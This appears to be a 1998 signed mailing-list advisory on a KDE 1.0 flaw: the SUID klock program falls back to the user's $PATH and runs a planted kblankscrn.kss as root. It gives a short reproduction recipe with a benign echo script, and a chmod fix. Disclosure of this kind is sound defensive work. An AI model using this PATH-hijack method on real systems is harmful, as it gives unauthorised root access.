-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --( the problem )--
The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss in the same directory as it. If kblankscrn.kss cannot
be executed (missing or mode -x) then klock will search the current
user's $PATH for any executable with the same name and execute it as
ROOT. If no executable is found in the current path it gives this
message:
>Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin
Default modes for klock and kblankscrn.kss are:
- -rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock
- -rwsr-xr-x 1 root root 43600 Mar 12 1998
/opt/kde/bin/kblankscrn.kss
Systems Affected: any system that runs KDE 1.0
____________________________________________________
( the exploit )
This is only exploitable if any of the following occurs:
1) klock is moved to another directory
2) kblankscrn.kss is moved to another directory
3) kblankscrn.kss is not executable
To see if you are vulnerable...
1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script thats looks like:
#!/bin/sh
echo Running script as `whoami`!
exit
4) name this script to kblankscrn.kss and mv to your home directory.
5) execute /opt/kde/bin/klock, you should see:
user@hostname:/home/user> /opt/kde/bin/klock
user@hostname:/home/user> Running script as root!
6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
____________________________________________________
- --( the fix )--
chmod 700 /opt/kde/bin/klock or wait until KDE is updated.
the KDE buglist has been notified
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
UmLBRO0nACQcXreodKkWFrpm
=rKnX
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:35 PDT